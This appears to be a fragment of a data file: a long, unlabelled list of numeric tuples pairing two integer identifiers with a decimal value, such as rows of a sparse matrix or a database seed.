(193, 13228, 0.88669),
(252, 13228, 0.88669),
(262, 13228, 0.88669),
(272, 13228, 0.88669),
(280, 13228, 0.88669),
(290, 13228, 0.88669),
(299, 13228, 0.88669),
(174, 13233, 0.88669),
(193, 13233, 0.88669),
(235, 13233, 0.88669),
(242, 13233, 0.88669),
(243, 13233, 0.88669),
(244, 13233, 0.88669),
(257, 13233, 0.88669),
(258, 13233, 0.88669),
(259, 13233, 0.88669),
(260, 13233, 0.88669),
(290, 13233, 0.88669),
(292, 13233, 0.88669),
(298, 13233, 0.88669),
(299, 13233, 0.88669),
(304, 13233, 0.88669),
(308, 13233, 0.88669),
(238, 13233, 1.77338),
(241, 13233, 1.77338),
(247, 13233, 1.77338),
(252, 13233, 1.77338),
(254, 13233, 1.77338),
(269, 13233, 1.77338),
(270, 13233, 1.77338),
(301, 13233, 1.77338),
(265, 13233, 2.66007),
(266, 13233, 2.66007),
(249, 13233, 3.92677),
(306, 13233, 6.20683),
(174, 13234, 0.98),
(193, 13234, 0.98),
(235, 13234, 0.98),
(243, 13234, 0.98),
(252, 13234, 0.98),
(254, 13234, 0.98),
(257, 13234, 0.98),
(259, 13234, 0.98),
(260, 13234, 0.98),
(265, 13234, 0.98),
(266, 13234, 0.98),
(269, 13234, 0.98),
(270, 13234, 1.96),
(301, 13234, 1.96),
(238, 13235, 0.95669),
(241, 13235, 0.95669),
(252, 13235, 0.95669),
(298, 13235, 0.95669),
(304, 13235, 0.95669),
(306, 13235, 0.95669),
(308, 13235, 0.95669),
(168, 13236, 0.86331),
(178, 13236, 0.86331),
(235, 13236, 0.86331),
(237, 13236, 0.86331),
(238, 13236, 0.86331),
(249, 13236, 0.86331),
(252, 13236, 0.86331),
(262, 13236, 0.86331),
(272, 13236, 0.86331),
(280, 13236, 0.86331),
(290, 13236, 0.86331),
(292, 13236, 0.86331),
(306, 13236, 0.86331),
(248, 13236, 1.72662),
(174, 13238, 0.84),
(258, 13238, 0.84),
(299, 13238, 0.84),
(305, 13238, 0.84),
(306, 13238, 0.84),
(252, 13238, 1.68),
(174, 13240, 0.95669),
(252, 13240, 0.95669),
(249, 13241, 0.95669),
(252, 13241, 0.95669),
(288, 13241, 0.95669),
(233, 13242, 0.95669),
(252, 13242, 0.95669),
(261, 13242, 0.95669),
(193, 13247, 0.88669),
(237, 13247, 0.88669),
(241, 13247, 0.88669),
(242, 13247, 0.88669),
(243, 13247, 0.88669),
(248, 13247, 0.88669),
(252, 13247, 0.88669),
(273, 13247, 0.88669),
(304, 13247, 0.88669),
(174, 13247, 1.77338),
(178, 13247, 1.77338),
(233, 13247, 1.77338),
(254, 13247, 2.66007),
(268, 13247, 2.66007),
(259, 13247, 3.54676),
(260, 13247, 3.54676),
(238, 13251, 0.88669),
(239, 13251, 0.88669),
(241, 13251, 0.88669),
(255, 13251, 0.88669),
(256, 13251, 0.88669),
(257, 13251, 0.88669),
(262, 13251, 0.88669),
(270, 13251, 0.88669),
(288, 13251, 0.88669),
(290, 13251, 0.88669),
(298, 13251, 0.88669),
(299, 13251, 0.88669),
(301, 13251, 0.88669),
(308, 13251, 0.88669),
(235, 13251, 1.77338),
(237, 13251, 1.77338),
(252, 13251, 1.77338),
(268, 13251, 1.77338),
(272, 13251, 1.77338),
(280, 13251, 1.77338),
(242, 13251, 2.66007),
(306, 13251, 3.54676),
(193, 13251, 7.09352),
(252, 13252, 0.98),
(272, 13252, 0.98),
(280, 13252, 0.98),
(298, 13252, 0.98),
(308, 13252, 0.98),
(168, 13258, 0.91),
(236, 13258, 0.91),
(256, 13258, 0.91),
(257, 13258, 0.91),
(262, 13258, 0.91),
(287, 13258, 0.91),
(290, 13258, 0.91),
(305, 13258, 0.91),
(252, 13258, 1.82),
(253, 13258, 1.82),
(254, 13258, 1.82),
(255, 13258, 1.82),
(275, 13258, 1.82),
(298, 13258, 1.82),
(299, 13258, 1.82),
(308, 13258, 1.82),
(240, 13258, 2.73),
(242, 13258, 2.73),
(239, 13258, 3.64),
(236, 13259, 1.02669),
(239, 13259, 1.02669),
(240, 13259, 1.02669),
(253, 13259, 1.02669),
(254, 13259, 1.02669),
(256, 13259, 1.02669),
(257, 13259, 1.02669),
(275, 13259, 1.02669),
(299, 13259, 1.02669),
(252, 13259, 2.05338),
(174, 13260, 0.91),
(257, 13260, 0.91),
(252, 13260, 1.82),
(193, 13262, 0.95669),
(252, 13262, 0.95669),
(270, 13262, 0.95669),
(273, 13262, 0.95669),
(301, 13262, 0.95669),
(306, 13262, 1.91338),
(49, 13262, 2.32339),
(269, 13262, 4.78345),
(193, 13263, 1.05),
(252, 13263, 1.05),
(243, 13264, 0.91),
(246, 13264, 0.91),
(252, 13264, 0.91),
(255, 13264, 0.91),
(257, 13264, 0.91),
(265, 13264, 0.91),
(266, 13264, 0.91),
(268, 13264, 0.91),
(270, 13264, 0.91),
(275, 13264, 0.91),
(292, 13264, 0.91),
(299, 13264, 0.91),
(301, 13264, 0.91),
(174, 13264, 1.82),
(241, 13264, 1.82),
(259, 13264, 1.82),
(260, 13264, 1.82),
(306, 13264, 1.82),
(239, 13264, 2.73),
(263, 13264, 2.73),
(288, 13264, 2.73),
(240, 13264, 3.64),
(242, 13264, 7.28),
(252, 13266, 0.93331),
(262, 13266, 0.93331),
(265, 13266, 0.93331),
(266, 13266, 0.93331),
(270, 13266, 0.93331),
(274, 13266, 0.93331),
(301, 13266, 0.93331),
(238, 13266, 1.86662),
(252, 13267, 1.02669),
(265, 13267, 1.02669),
(266, 13267, 1.02669),
(233, 13272, 0.88669),
(237, 13272, 0.88669),
(241, 13272, 0.88669),
(242, 13272, 0.88669),
(243, 13272, 0.88669),
(252, 13272, 0.88669),
(254, 13272, 0.88669),
(255, 13272, 0.88669),
(259, 13272, 0.88669),
(260, 13272, 0.88669),
(263, 13272, 0.88669),
(264, 13272, 0.88669),
(265, 13272, 0.88669),
(266, 13272, 0.88669),
(275, 13272, 0.88669),
(298, 13272, 0.88669),
(304, 13272, 0.88669),
(305, 13272, 0.88669),
(306, 13272, 0.88669),
(308, 13272, 0.88669),
(235, 13272, 1.77338),
(244, 13272, 1.77338),
(249, 13272, 1.77338),
(253, 13272, 1.77338),
(256, 13272, 1.77338),
(299, 13272, 1.77338),
(174, 13272, 2.66007),
(236, 13272, 2.66007),
(238, 13272, 2.66007),
(247, 13272, 2.66007),
(257, 13272, 2.66007),
(288, 13272, 2.66007),
(267, 13272, 3.54676),
(178, 13272, 4.43345),
(193, 13272, 4.43345),
(290, 13272, 4.43345),
(292, 13272, 4.43345),
(258, 13272, 12.4137),
(233, 13276, 0.91),
(238, 13276, 0.91),
(252, 13276, 0.91),
(275, 13276, 0.91),
(304, 13276, 0.91),
(305, 13276, 0.91),
(306, 13276, 0.91),
(288, 13276, 1.82),
(259, 13276, 2.73),
(260, 13276, 2.73),
(233, 13277, 0.98),
(238, 13277, 0.98),
(252, 13277, 0.98),
(275, 13277, 0.98),
(305, 13277, 0.98),
(306, 13277, 0.98),
(288, 13277, 1.96),
(259, 13277, 2.94),
(260, 13277, 2.94),
(233, 13280, 0.88669),
(238, 13280, 0.88669),
(252, 13280, 0.88669),
(263, 13280, 0.88669),
(275, 13280, 0.88669),
(305, 13280, 0.88669),
(306, 13280, 0.88669),
(236, 13282, 0.88669),
(264, 13282, 0.88669),
(252, 13282, 1.77338),
(236, 13283, 0.95669),
(264, 13283, 0.95669),
(252, 13283, 1.91338),
(233, 13284, 0.91),
(252, 13284, 0.91),
(254, 13284, 0.91),
(193, 13286, 0.88669),
(243, 13286, 0.88669),
(252, 13286, 0.88669),
(290, 13286, 0.88669),
(193, 13287, 0.95669),
(243, 13287, 0.95669),
(252, 13287, 0.95669),
(290, 13287, 0.95669),
(304, 13288, 0.02331),
(298, 13288, 0.04662),
(301, 13288, 0.04662),
(236, 13288, 0.18669),
(240, 13288, 0.18669),
(241, 13288, 0.18669),
(246, 13288, 0.18669),
(249, 13288, 0.18669),
(258, 13288, 0.18669),
(259, 13288, 0.18669),
(260, 13288, 0.18669),
(263, 13288, 0.18669),
(268, 13288, 0.18669),
(269, 13288, 0.18669),
(273, 13288, 0.18669),
(290, 13288, 0.18669),
(243, 13288, 0.37338),
(248, 13288, 0.37338),
(267, 13288, 0.37338),
(270, 13288, 0.37338),
(288, 13288, 0.37338),
(292, 13288, 0.37338),
(306, 13288, 0.37338),
(308, 13288, 0.37338),
(257, 13288, 0.56007),
(239, 13288, 0.74676),
(255, 13288, 0.74676),
(265, 13288, 0.74676),
(266, 13288, 0.74676),
(275, 13288, 0.74676),
(178, 13288, 0.93345),
(238, 13288, 0.93345),
(252, 13288, 0.93345),
(242, 13288, 1.12014),
(256, 13288, 1.12014),
(174, 13288, 2.24028),
(299, 13299, 0.02919),
(305, 13299, 0.02919),
(295, 13299, 0.05838),
(301, 13299, 0.05838),
(304, 13299, 0.05838),
(168, 13299, 0.23331),
(242, 13299, 0.23331),
(245, 13299, 0.23331),
(258, 13299, 0.23331),
(259, 13299, 0.23331),
(260, 13299, 0.23331),
(262, 13299, 0.23331),
(267, 13299, 0.23331),
(273, 13299, 0.23331),
(178, 13299, 0.46662),
(236, 13299, 0.46662),
(261, 13299, 0.46662),
(270, 13299, 0.46662),
(272, 13299, 0.46662),
(274, 13299, 0.46662),
(280, 13299, 0.46662),
(193, 13299, 0.69993),
(238, 13299, 0.69993),
(241, 13299, 0.69993),
(243, 13299, 0.69993),
(256, 13299, 0.69993),
(263, 13299, 0.69993),
(269, 13299, 0.69993),
(239, 13299, 0.93324),
(252, 13299, 0.93324),
(253, 13299, 0.93324),
(288, 13299, 0.93324),
(235, 13299, 1.16655),
(237, 13299, 1.16655),
(240, 13299, 1.16655),
(255, 13299, 1.16655),
(257, 13299, 1.16655),
(306, 13299, 1.16655),
(174, 13299, 1.39986),
(292, 13299, 1.63317),
(254, 13299, 1.86648),
(193, 13300, 0.91),
(235, 13300, 0.91),
(237, 13300, 0.91),
(240, 13300, 0.91),
(257, 13300, 0.91),
(258, 13300, 0.91),
(259, 13300, 0.91),
(260, 13300, 0.91),
(270, 13300, 0.91),
(272, 13300, 0.91),
(274, 13300, 0.91),
(280, 13300, 0.91),
(301, 13300, 0.91),
(304, 13300, 0.91),
(305, 13300, 0.91),
(174, 13300, 1.82),
(252, 13300, 1.82),
(256, 13300, 1.82),
(261, 13300, 1.82),
(292, 13300, 1.82),
(306, 13300, 1.82),
(254, 13300, 2.73),
(261, 13301, 1.02669),
(306, 13301, 1.02669),
(252, 13301, 2.05338),
(174, 13302, 0.88669),
(239, 13302, 0.88669),
(241, 13302, 0.88669),
(242, 13302, 0.88669),
(253, 13302, 0.88669),
(256, 13302, 0.88669),
(257, 13302, 0.88669),
(262, 13302, 0.88669),
(263, 13302, 0.88669),
(267, 13302, 0.88669),
(270, 13302, 0.88669),
(273, 13302, 0.88669),
(299, 13302, 0.88669),
(301, 13302, 0.88669),
(306, 13302, 0.88669),
(193, 13302, 1.77338),
(238, 13302, 1.77338),
(240, 13302, 1.77338),
(243, 13302, 1.77338),
(252, 13302, 1.77338),
(292, 13302, 1.77338),
(235, 13302, 2.66007),
(237, 13302, 2.66007),
(254, 13302, 2.66007),
(269, 13302, 2.66007),
(288, 13302, 2.66007),
(255, 13302, 3.54676),
(174, 13303, 0.93331),
(193, 13303, 0.93331),
(237, 13303, 0.93331),
(240, 13303, 0.93331),
(253, 13303, 0.93331),
(255, 13303, 0.93331),
(257, 13303, 0.93331),
(262, 13303, 0.93331),
(263, 13303, 0.93331),
(269, 13303, 0.93331),
(270, 13303, 0.93331),
(301, 13303, 0.93331),
(235, 13303, 1.86662),
(252, 13303, 1.86662),
(254, 13303, 1.86662),
(292, 13303, 1.86662),
(174, 13304, 0.42),
(178, 13304, 0.42),
(235, 13304, 0.42),
(237, 13304, 0.42),
(242, 13304, 0.42),
(243, 13304, 0.42),
(244, 13304, 0.42),
(252, 13304, 0.42),
(259, 13304, 0.42),
(260, 13304, 0.42),
(265, 13304, 0.42),
(266, 13304, 0.42),
(270, 13304, 0.42),
(299, 13304, 0.42),
(301, 13304, 0.42),
(305, 13304, 0.42),
(262, 13304, 0.84),
(174, 13307, 0.28),
(237, 13307, 0.28),
(239, 13307, 0.28),
(249, 13307, 0.28),
(252, 13307, 0.28),
(253, 13307, 0.28),
(262, 13307, 0.28),
(265, 13307, 0.28),
(266, 13307, 0.28),
(288, 13307, 0.28),
(295, 13307, 0.28),
(304, 13307, 0.28),
(305, 13307, 0.28),
(236, 13307, 0.56),
(245, 13307, 0.56),
(246, 13307, 0.56),
(254, 13307, 0.56),
(256, 13307, 0.56),
(269, 13307, 0.56),
(292, 13307, 0.56),
(306, 13307, 0.56),
(193, 13307, 0.84),
(240, 13307, 0.84),
(243, 13307, 0.84),
(255, 13307, 0.84),
(263, 13307, 0.84),
(178, 13307, 1.12),
(242, 13307, 1.12),
(244, 13307, 1.12),
(257, 13307, 1.12),
(299, 13307, 1.12),
(274, 13307, 1.4),
(193, 13308, 0.95669),
(237, 13308, 0.95669),
(240, 13308, 0.95669),
(242, 13308, 0.95669),
(243, 13308, 0.95669),
(246, 13308, 0.95669),
(252, 13308, 0.95669),
(306, 13308, 0.95669),
(257, 13308, 1.91338),
(174, 13314, 0.32669),
(193, 13314, 0.32669),
(243, 13314, 0.32669),
(244, 13314, 0.32669),
(252, 13314, 0.32669),
(254, 13314, 0.32669),
(257, 13314, 0.32669),
(260, 13314, 0.32669),
(267, 13314, 0.32669),
(272, 13314, 0.32669),
(273, 13314, 0.32669),
(280, 13314, 0.32669),
(287, 13314, 0.32669),
(288, 13314, 0.32669),
(292, 13314, 0.32669),
(306, 13314, 0.32669),
(178, 13314, 0.65338),
(242, 13314, 0.65338),
(259, 13314, 0.65338),
(265, 13314, 0.65338),
(266, 13314, 0.65338),
(298, 13314, 0.65338),
(299, 13314, 0.65338),
(304, 13314, 0.65338),
(305, 13314, 0.65338),
(308, 13314, 0.65338),
(240, 13314, 0.98007),
(262, 13314, 0.98007),
(264, 13314, 0.98007),
(275, 13314, 0.98007),
(239, 13314, 1.30676),
(299, 13317, 0.02919),
(174, 13317, 0.23331),
(178, 13317, 0.23331),
(239, 13317, 0.23331),
(241, 13317, 0.23331),
(243, 13317, 0.23331),
(249, 13317, 0.23331),
(252, 13317, 0.23331),
(262, 13317, 0.23331),
(265, 13317, 0.23331),
(266, 13317, 0.23331),
(273, 13317, 0.23331),
(244, 13317, 0.46662),
(254, 13317, 0.46662),
(242, 13317, 0.93324),
(193, 13320, 0.79331),
(233, 13320, 0.79331),
(240, 13320, 0.79331),
(241, 13320, 0.79331),
(242, 13320, 0.79331),
(243, 13320, 0.79331),
(249, 13320, 0.79331),
(252, 13320, 0.79331),
(254, 13320, 0.79331),
(272, 13320, 0.79331),
(280, 13320, 0.79331),
(305, 13320, 0.79331),
(239, 13320, 1.58662),
(258, 13320, 1.58662),
(267, 13320, 1.58662),
(304, 13320, 2.37993),
(252, 13324, 0.93331),
(258, 13324, 0.93331),
(262, 13324, 0.93331),
(240, 13324, 1.86662),
(193, 13326, 0.81669),
(236, 13326, 0.81669),
(239, 13326, 0.81669),
(249, 13326, 0.81669),
(254, 13326, 0.81669),
(257, 13326, 0.81669),
(263, 13326, 0.81669),
(265, 13326, 0.81669),
(266, 13326, 0.81669),
(272, 13326, 0.81669),
(280, 13326, 0.81669),
(292, 13326, 0.81669),
(299, 13326, 0.81669),
(168, 13326, 1.63338),
(178, 13326, 1.63338),
(240, 13326, 1.63338),
(241, 13326, 1.63338),
(242, 13326, 1.63338),
(269, 13326, 1.63338),
(273, 13326, 2.45007),
(304, 13326, 2.45007),
(305, 13326, 2.45007),
(306, 13326, 4.08345),
(252, 13326, 6.53352),
(240, 13331, 0.88669),
(242, 13331, 0.88669),
(252, 13331, 0.88669),
(254, 13331, 0.88669),
(265, 13333, 0.93331),
(266, 13333, 0.93331),
(269, 13333, 0.93331),
(252, 13333, 1.86662),
(252, 13334, 0.95669),
(262, 13334, 0.95669),
(168, 13336, 0.86331),
(193, 13336, 0.86331),
(236, 13336, 0.86331),
(243, 13336, 0.86331),
(252, 13336, 0.86331),
(259, 13336, 0.86331),
(260, 13336, 0.86331),
(265, 13336, 0.86331),
(266, 13336, 0.86331),
(288, 13336, 0.86331),
(299, 13336, 0.86331),
(305, 13336, 0.86331),
(174, 13336, 1.72662),
(168, 13342, 0.84),
(233, 13342, 0.84),
(244, 13342, 0.84),
(247, 13342, 0.84),
(248, 13342, 0.84),
(253, 13342, 0.84),
(254, 13342, 0.84),
(255, 13342, 0.84),
(262, 13342, 0.84),
(264, 13342, 0.84),
(268, 13342, 0.84),
(269, 13342, 0.84),
(292, 13342, 0.84),
(295, 13342, 0.84),
(305, 13342, 0.84),
(174, 13342, 1.68),
(178, 13342, 1.68),
(238, 13342, 1.68),
(240, 13342, 1.68),
(241, 13342, 1.68),
(243, 13342, 1.68),
(245, 13342, 1.68),
(252, 13342, 1.68),
(265, 13342, 1.68),
(266, 13342, 1.68),
(267, 13342, 1.68),
(274, 13342, 1.68),
(298, 13342, 1.68),
(308, 13342, 1.68),
(236, 13342, 2.52),
(242, 13342, 2.52),
(258, 13342, 2.52),
(193, 13342, 3.36),
(239, 13342, 3.36),
(270, 13342, 4.2),
(301, 13342, 4.2),
(306, 13342, 4.2),
(304, 13342, 5.04),
(273, 13342, 6.24),
(174, 13345, 0.86331),
(242, 13345, 0.86331),
(252, 13345, 0.86331),
(256, 13345, 0.86331),
(275, 13345, 0.86331),
(298, 13345, 0.86331),
(308, 13345, 0.86331),
(242, 13347, 0.14),
(252, 13347, 0.14),
(255, 13347, 0.14),
(261, 13347, 0.14),
(269, 13347, 0.14),
(273, 13347, 0.14),
(274, 13347, 0.14),
(267, 13347, 0.28),
(268, 13347, 0.28),
(239, 13347, 0.42),
(259, 13347, 0.42),
(260, 13347, 0.42),
(252, 13348, 0.88669),
(259, 13348, 0.88669),
(260, 13348, 0.88669),
(233, 16160, 0.37331),
(299, 16160, 0.37331),
(233, 16161, 0.95669),
(299, 16161, 0.95669),
(193, 17024, 0.98),
(242, 17024, 0.98),
(244, 17024, 0.98),
(298, 17024, 0.98),
(299, 17024, 0.98),
(308, 17024, 0.98),
(267, 17024, 1.96),
(257, 17024, 8.82),
(193, 17025, 1.05),
(242, 17025, 1.05),
(244, 17025, 1.05),
(298, 17025, 1.05),
(299, 17025, 1.05),
(308, 17025, 1.05),
(267, 17025, 2.1),
(257, 17025, 8.4),
(299, 17047, 0.02331),
(193, 17047, 0.18669),
(233, 17047, 0.18669),
(246, 17047, 0.18669),
(248, 17047, 0.18669),
(249, 17047, 0.18669),
(254, 17047, 0.18669),
(255, 17047, 0.18669),
(258, 17047, 0.18669),
(262, 17047, 0.18669),
(263, 17047, 0.18669),
(265, 17047, 0.18669),
(266, 17047, 0.18669),
(267, 17047, 0.18669),
(178, 17047, 0.37338),
(236, 17047, 0.37338),
(292, 17047, 0.37338),
(306, 17047, 0.37338),
(298, 17058, 0.02331),
(305, 17058, 0.04662),
(301, 17058, 0.09324),
(233, 17058, 0.18669),
(237, 17058, 0.18669),
(241, 17058, 0.18669),
(246, 17058, 0.18669),
(249, 17058, 0.18669),
(253, 17058, 0.18669),
(259, 17058, 0.18669),
(260, 17058, 0.18669),
(263, 17058, 0.18669),
(274, 17058, 0.18669),
(275, 17058, 0.18669),
(288, 17058, 0.18669),
(308, 17058, 0.18669),
(193, 17058, 0.37338),
(240, 17058, 0.37338),
(261, 17058, 0.37338),
(264, 17058, 0.37338),
(268, 17058, 0.37338),
(292, 17058, 0.37338),
(238, 17058, 0.56007),
(256, 17058, 0.56007),
(290, 17058, 0.56007),
(306, 17058, 0.56007),
(178, 17058, 0.74676),
(236, 17058, 0.74676),
(270, 17058, 0.74676),
(248, 17058, 0.93345),
(272, 17058, 0.93345),
(280, 17058, 0.93345),
(258, 17058, 1.12014),
(239, 17058, 1.30683),
(242, 17058, 1.68021),
(243, 17058, 2.80035),
(174, 17058, 2.98704),
(233, 17126, 0.84),
(263, 17126, 0.84),
(299, 17126, 0.84),
(242, 17126, 1.68),
(305, 17126, 1.68),
(168, 17126, 3.36),
(233, 17138, 0.84),
(243, 17138, 0.84),
(262, 17138, 0.84),
(265, 17138, 0.84),
(266, 17138, 0.84),
(267, 17138, 0.84),
(268, 17138, 0.84),
(272, 17138, 0.84),
(280, 17138, 0.84),
(299, 17138, 0.84),
(306, 17138, 0.84),
(240, 17138, 1.68),
(253, 17138, 1.68),
(275, 17138, 1.68),
(305, 17138, 1.68),
(168, 17140, 0.23331),
(174, 17140, 0.23331),
(236, 17140, 0.23331),
(237, 17140, 0.23331),
(238, 17140, 0.23331),
(239, 17140, 0.23331),
(240, 17140, 0.23331),
(242, 17140, 0.23331),
(243, 17140, 0.23331),
(244, 17140, 0.23331),
(246, 17140, 0.23331),
(249, 17140, 0.23331),
(253, 17140, 0.23331),
(256, 17140, 0.23331),
(261, 17140, 0.23331),
(263, 17140, 0.23331),
(264, 17140, 0.23331),
(273, 17140, 0.23331),
(274, 17140, 0.23331),
(298, 17140, 0.23331),
(299, 17140, 0.23331),
(304, 17140, 0.23331),
(305, 17140, 0.23331),
(308, 17140, 0.23331),
(306, 17140, 0.46662),
(275, 17140, 0.69993),
(292, 17140, 1.16655),
(275, 17141, 0.86331),
(298, 17141, 0.86331),
(299, 17141, 0.86331),
(308, 17141, 0.86331),
(174, 20832, 0.14),
(233, 20832, 0.14),
(264, 20832, 0.74),
(174, 20981, 0.04669),
(233, 20981, 0.04669),
(246, 20981, 0.04669),
(248, 20981, 0.04669),
(255, 20981, 0.04669),
(274, 20981, 0.04669),
(306, 20981, 0.04669),
(253, 20984, 0.42),
(273, 20984, 0.42),
(233, 20984, 1.26),
(233, 21236, 0.23331),
(239, 21236, 0.93324),
(174, 21239, 0.88669),
(193, 21239, 0.88669),
(233, 21239, 0.88669),
(238, 21239, 0.88669),
(239, 21239, 0.88669),
(242, 21239, 0.88669),
(274, 21239, 0.88669),
(292, 21239, 0.88669),
(236, 21239, 1.77338),
(245, 21243, 0.98),
(267, 21243, 0.98),
(233, 21243, 1.96),
(233, 21244, 1.07331),
(245, 21244, 1.07331),
(178, 21248, 0.88669),
(193, 21248, 0.88669),
(248, 21248, 0.88669),
(255, 21248, 0.88669),
(257, 21248, 0.88669),
(258, 21248, 0.88669),
(259, 21248, 0.88669),
(260, 21248, 0.88669),
(264, 21248, 0.88669),
(239, 21248, 1.77338),
(262, 21248, 1.77338),
(298, 21248, 1.77338),
(308, 21248, 1.77338),
(267, 21248, 3.54676),
(233, 21248, 5.32014),
(268, 21248, 5.32014),
(304, 21248, 7.98021),
(305, 21248, 18.6205),
(262, 21249, 1.02669),
(267, 21249, 1.02669),
(304, 21249, 1.02669),
(268, 21249, 2.05338),
(305, 21249, 2.05338),
(233, 21249, 6.16014),
(233, 21251, 0.91),
(236, 21251, 0.91),
(292, 21251, 0.91),
(256, 21251, 1.82),
(233, 21252, 0.98),
(292, 21252, 0.98),
(256, 21252, 1.96),
(233, 21253, 1.91338),
(264, 21253, 1.91338),
(233, 21262, 0.91),
(275, 21262, 0.91),
(233, 21267, 0.86331),
(272, 21267, 0.86331),
(273, 21267, 0.86331),
(280, 21267, 0.86331),
(288, 21267, 0.86331),
(305, 21267, 0.86331),
(178, 21270, 0.86331),
(233, 21270, 0.86331),
(246, 21270, 0.86331),
(254, 21270, 0.86331),
(242, 21270, 1.72662),
(288, 21270, 2.58993),
(249, 21272, 0.93331),
(272, 21272, 0.93331),
(280, 21272, 0.93331),
(233, 21272, 7.59981),
(233, 21274, 0.88669),
(255, 21274, 0.88669),
(306, 21274, 0.88669),
(239, 21274, 1.77338),
(233, 21275, 0.95669),
(239, 21275, 1.91338),
(233, 21278, 0.88669),
(264, 21278, 0.88669),
(193, 21278, 4.81346),
(233, 21280, 0.95669),
(267, 21280, 0.95669),
(268, 21280, 0.95669),
(305, 21280, 0.95669),
(304, 21280, 5.74014),
(233, 21283, 0.91),
(240, 21283, 0.91),
(242, 21284, 0.32669),
(256, 21284, 0.32669),
(233, 21284, 1.30676),
(239, 21284, 1.30676),
(264, 22868, 0.79331),
(299, 22868, 0.79331),
(299, 22873, 0.79331),
(246, 22873, 1.58662),
(178, 23291, 0.23331),
(244, 23291, 0.23331),
(263, 23291, 0.23331),
(264, 23291, 0.23331),
(272, 23291, 0.23331),
(280, 23291, 0.23331),
(299, 23291, 0.23331),
(236, 23291, 0.46662),
(239, 23291, 0.46662),
(269, 23291, 0.46662),
(306, 23291, 0.46662),
(240, 23291, 0.93324),
(269, 23292, 0.91),
(299, 23292, 0.91),
(193, 23294, 0.28),
(238, 23294, 0.28),
(240, 23294, 0.28),
(299, 23294, 0.28),
(239, 23294, 0.56),
(269, 23294, 0.84),
(168, 23297, 0.14),
(239, 23297, 0.14),
(240, 23297, 0.14),
(245, 23297, 0.14),
(248, 23297, 0.14),
(299, 23297, 0.14),
(304, 23297, 0.14),
(244, 23297, 0.28),
(174, 23302, 0.37331),
(238, 23302, 0.37331),
(264, 23302, 0.37331),
(275, 23302, 0.37331),
(299, 23302, 0.37331),
(178, 23302, 0.74662),
(235, 23302, 0.74662),
(240, 23302, 0.74662),
(288, 23302, 1.11993),
(174, 23303, 1.02669),
(299, 23303, 1.02669),
(174, 23304, 1.09669),
(299, 23304, 1.09669),
(272, 24094, 1.07331),
(280, 24094, 1.07331),
(299, 24094, 1.07331),
(248, 24098, 0.42),
(299, 24098, 0.42),
(299, 24101, 0.23331),
(247, 24101, 1.39986),
(299, 24107, 0.95669),
(244, 24107, 1.91338),
(236, 24113, 0.93331),
(246, 24113, 0.93331),
(299, 24113, 0.93331),
(235, 24113, 1.86662),
(174, 24115, 0.86331),
(267, 24115, 0.86331),
(299, 24115, 0.86331),
(235, 24119, 0.98),
(237, 24119, 0.98),
(238, 24119, 0.98),
(262, 24119, 0.98),
(290, 24119, 0.98),
(299, 24119, 0.98),
(193, 24119, 2.94),
(244, 24120, 0.91),
(261, 24120, 0.91),
(299, 24120, 0.91),
(268, 24120, 1.82),
(244, 24121, 1.02669),
(299, 24121, 1.02669),
(253, 24124, 1.02669),
(299, 24124, 1.02669),
(244, 24125, 0.91),
(274, 24125, 0.91),
(299, 24125, 0.91),
(235, 24127, 0.88669),
(236, 24127, 0.88669),
(265, 24127, 0.88669),
(266, 24127, 0.88669),
(274, 24127, 0.88669),
(299, 24127, 0.88669),
(178, 24130, 0.91),
(238, 24130, 0.91),
(243, 24130, 0.91),
(299, 24130, 0.91),
(256, 24130, 8.19),
(178, 24131, 0.98),
(238, 24131, 0.98),
(243, 24131, 0.98),
(299, 24131, 0.98),
(243, 24132, 0.93331),
(269, 24132, 0.93331),
(304, 24132, 0.93331),
(239, 24132, 1.86662),
(299, 24132, 1.86662),
(240, 24132, 2.79993),
(244, 24132, 3.19992),
(238, 24135, 0.91),
(254, 24135, 0.91),
(299, 24135, 0.91),
(178, 24139, 0.93331),
(299, 24139, 0.93331),
(193, 24141, 0.86331),
(240, 24141, 0.86331),
(273, 24141, 0.86331),
(299, 24141, 0.86331),
(262, 24143, 0.91),
(299, 24143, 0.91),
(244, 24143, 1.82),
(193, 24145, 0.88669),
(241, 24145, 0.88669),
(245, 24145, 0.88669),
(256, 24145, 0.88669),
(299, 24145, 0.88669),
(243, 24145, 1.77338),
(270, 24145, 2.66007),
(301, 24145, 2.66007),
(193, 24146, 0.95669),
(241, 24146, 0.95669),
(245, 24146, 0.95669),
(256, 24146, 0.95669),
(270, 24146, 0.95669),
(299, 24146, 0.95669),
(301, 24146, 0.95669),
(243, 24146, 1.91338),
(253, 24163, 0.86331),
(299, 24163, 0.86331),
(253, 24164, 0.93331),
(299, 24164, 0.93331),
(299, 24165, 0.91),
(244, 24165, 1.82),
(299, 24166, 0.98),
(244, 24166, 1.96),
(263, 24167, 0.91),
(299, 24167, 0.91),
(240, 24169, 1.00331),
(242, 24169, 1.00331),
(246, 24169, 1.00331),
(299, 24169, 1.00331),
(241, 24171, 0.98),
(299, 24171, 0.98),
(244, 24177, 1.00331),
(299, 24177, 1.00331),
(244, 24178, 1.07331),
(299, 24178, 1.07331),
(304, 24179, 0.02919),
(299, 24179, 0.05838),
(305, 24179, 0.05838),
(174, 24179, 0.23331),
(178, 24179, 0.23331),
(193, 24179, 0.23331),
(235, 24179, 0.23331),
(240, 24179, 0.23331),
(244, 24179, 0.23331),
(245, 24179, 0.23331),
(255, 24179, 0.23331),
(263, 24179, 0.23331),
(264, 24179, 0.23331),
(265, 24179, 0.23331),
(266, 24179, 0.23331),
(267, 24179, 0.23331),
(241, 24179, 0.46662),
(254, 24179, 0.46662),
(236, 24179, 0.69993),
(239, 24179, 0.69993),
(262, 24179, 1.16655),
(306, 24179, 1.16655),
(238, 24179, 1.89981),
(243, 24179, 2.83305),
(240, 24182, 0.98),
(299, 24182, 0.98),
(258, 24186, 0.23331),
(299, 24186, 0.23331),
(178, 24186, 0.93324),
(178, 24187, 0.95669),
(299, 24187, 0.95669),
(178, 24189, 0.23331),
(235, 24189, 0.23331),
(236, 24189, 0.23331),
(240, 24189, 0.23331),
(254, 24189, 0.23331),
(268, 24189, 0.23331),
(272, 24189, 0.23331),
(280, 24189, 0.23331),
(288, 24189, 0.23331),
(299, 24189, 0.23331),
(305, 24189, 0.23331),
(239, 24189, 0.46662),
(245, 24189, 0.46662),
(249, 24189, 0.46662),
(269, 24189, 0.46662),
(242, 24189, 0.93324),
(254, 24192, 0.93331),
(269, 24192, 0.93331),
(295, 24192, 0.93331),
(304, 24192, 0.93331),
(299, 24192, 1.86662),
(236, 24195, 0.91),
(239, 24195, 0.91),
(299, 24195, 0.91),
(243, 24195, 1.82),
(247, 24206, 0.18669),
